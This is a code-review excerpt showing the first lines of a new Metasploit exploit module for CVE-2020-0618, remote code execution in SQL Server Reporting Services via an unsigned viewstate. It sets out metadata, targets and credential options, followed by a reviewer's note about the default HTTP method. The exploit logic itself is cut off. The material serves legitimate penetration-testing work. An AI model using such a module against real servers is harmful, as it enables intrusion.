modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb

```diff
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'SQL Server Reporting Services (SSRS) Viewstate Deserialization',
+      'Description' => %q{
+        A vulnerability exists within Microsoft's SQL Server Reporting Services
+        which can allow an attacker to craft an HTTP POST request with a
+        serialized object to achieve remote code execution. The vulnerability is
+        due to the fact that the serialized blob is not signed by the server.
+      },
+      'Author' => 'Spencer McIntyre',
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2020-0618'],
+        ['URL', 'https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/'],
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 3000 } ]
+        ],
+      'DefaultTarget'  => 1,
+      'DisclosureDate' => '2020-02-11'))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/Reports' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+    register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
+    ])
+  end
+
+  def send_api_request(*parts)
+    res = send_request_cgi({
```

Comment:
Not everyone will know this method defaults to `GET` for the HTTP method, so it may be clearer to specify it explicitly.